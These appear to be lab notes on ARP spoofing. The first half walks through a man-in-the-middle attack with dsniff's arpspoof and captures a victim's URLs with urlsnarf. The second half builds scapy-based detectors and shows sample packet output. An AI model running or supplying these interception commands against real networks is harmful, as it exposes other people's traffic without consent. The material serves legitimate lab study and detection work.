Start by running sudo -i to become a root user.
Update the package lists: apt-get update
Install: apt-get install dsniff
The dsniff package contains several useful tools for intercepting network traffic, such as arpspoof, a tool that executes an ARP spoofing attack.
netdiscover
It issues ARP queries for all possible IP addresses on the subnetwork, and when a machine on the network responds, it records and displays the machine’s MAC address and IP address.
netdiscover -r 10.10.10.0/24
Once you have found the machine, press CTRL+C to stop.
Next, allow Kali to forward packets.
Enable IP forwarding by setting the IP forwarding flag:
echo 1 > /proc/sys/net/ipv4/ip_forward
Generate multiple fake ARP replies by running the following command:
arpspoof -i eth0 -t <VICTIM_IP> <ROUTER_IP>
The -t flag specifies the target.
The -i flag specifies the interface.
In the arpspoof output, 0806 is a type field indicating that an ARP packet is contained within the Ethernet frame being transmitted.
42 represents the total number of bytes associated with the Ethernet frame.
Also trick the router into believing you’re the victim so that you can intercept incoming internet traffic on the victim’s behalf.
arpspoof -i eth0 -t <ROUTER_IP> <VICTIM_IP>
Extract the URLs by running the following command in a new terminal (it captures URLs from the traffic on eth0):
kali@kali:~$ sudo urlsnarf -i eth0
Detecting ARP spoofing attacks (install the packages first):
sudo apt install python3-pip
pip3 install --pre scapy[basic]
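Run mousepad in the background: mousepad &
from scapy.all import sniff

# Maps each source MAC address to the first IP address it was seen claiming.
IP_MAC_MAP = {}

def processPacket(packet):
    src_IP = packet['ARP'].psrc
    src_MAC = packet['Ether'].src
    if src_MAC in IP_MAC_MAP.keys():
        # A known MAC is now claiming a different IP: possible ARP spoofing.
        if IP_MAC_MAP[src_MAC] != src_IP:
            try:
                old_IP = IP_MAC_MAP[src_MAC]
            except KeyError:
                old_IP = "unknown"
            message = str(old_IP) + " is pretending to be " + str(src_IP)
            return message
    else:
        IP_MAC_MAP[src_MAC] = src_IP

# Run as root: sniff ARP packets indefinitely and print whatever processPacket returns.
sniff(count=0, filter="arp", store=0, prn=processPacket)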
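An added example, not part of the original notes: the same check run offline, parsing the 42-byte Ethernet+ARP frame (type field 0806) with the standard library and also tracking the IP-to-MAC direction, which the script above does not. The helper names (sample_reply, parse_arp, detect) and all MAC/IP values are constructed assumptions for illustration.

```python
import socket
import struct

ETHERTYPE_ARP = 0x0806  # the "0806" type field in the Ethernet header
MIN_LEN = 42            # 14-byte Ethernet header + 28-byte ARP body

def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def sample_reply(src_mac, src_ip, dst_mac, dst_ip):
    """Build a constructed 42-byte is-at frame in memory, as test input only."""
    smac = bytes.fromhex(src_mac.replace(":", ""))
    dmac = bytes.fromhex(dst_mac.replace(":", ""))
    header = dmac + smac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # Ethernet, IPv4, 6, 4, is-at
    return header + arp + smac + socket.inet_aton(src_ip) + dmac + socket.inet_aton(dst_ip)

def parse_arp(frame):
    """Return (hwsrc, psrc) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < MIN_LEN or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    if struct.unpack("!HHBB", frame[14:20]) != (1, 0x0800, 6, 4):
        return None
    return fmt_mac(frame[22:28]), socket.inet_ntoa(frame[28:32])

def detect(frames):
    """Alert when an IP is claimed by a new MAC or one MAC claims several IPs."""
    ip_to_mac, mac_to_ips, alerts = {}, {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue  # not ARP, truncated, or an unexpected address format
        hwsrc, psrc = parsed
        first_mac = ip_to_mac.setdefault(psrc, hwsrc)
        if first_mac != hwsrc:
            alerts.append(f"{psrc} was at {first_mac}, now claimed by {hwsrc}")
        mac_to_ips.setdefault(hwsrc, set()).add(psrc)
        if len(mac_to_ips[hwsrc]) > 1:
            alerts.append(f"{hwsrc} claims several IPs: {sorted(mac_to_ips[hwsrc])}")
    return alerts

# Constructed lab addresses (assumptions, not taken from a real capture).
ROUTER, VICTIM, OTHER = "08:00:27:00:00:01", "08:00:27:00:00:05", "08:00:27:00:00:07"
FRAMES = [
    sample_reply(ROUTER, "10.10.10.1", VICTIM, "10.10.10.5"),  # genuine router reply
    sample_reply(OTHER, "10.10.10.7", VICTIM, "10.10.10.5"),   # host announcing itself
    sample_reply(OTHER, "10.10.10.1", VICTIM, "10.10.10.5"),   # forged: router IP, wrong MAC
]
print("\n".join(detect(FRAMES)))  # run the detector over the constructed frames
```

The first MAC seen for an IP is treated as the baseline, so a detector started after spoofing has begun will learn the forged binding as if it were genuine.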
My exploratory code, which starts listening for ARP packets:
from scapy.all import *

def handlePacket(p):
    # src_IP = p['ARP'].psrc
    # src_MAC = p['Ethernet'].src
    # message=str(src_IP)+" : "+str(src_MAC)
    # return message
    p.show()  # print every layer and field of the captured packet

sniff(prn=handlePacket, filter="arp", count=0)
Start the ARP spoofing attack from Linux:
sudo arpspoof -i eth0 -t 10.10.10.5 10.10.10.1
Result:
###[ Ethernet ]###
dst = 08:00:27:49:84:59
src = 08:00:27:a6:1f:86
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = 6
plen = 4
op = who-has
hwsrc = 08:00:27:a6:1f:86
psrc = 10.10.10.7
hwdst = 00:00:00:00:00:00
pdst = 10.10.10.3
###[ Ethernet ]###
dst = 08:00:27:a6:1f:86
src = 08:00:27:49:84:59
type = ARP
###[ ARP ]###
hwtype = 0x1
ptype = IPv4
hwlen = 6
plen = 4
op = is-at
hwsrc = 08:00:27:49:84:59
psrc = 10.10.10.3
hwdst = 08:00:27:a6:1f:86
pdst = 10.10.10.7
###[ Padding ]###
load = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'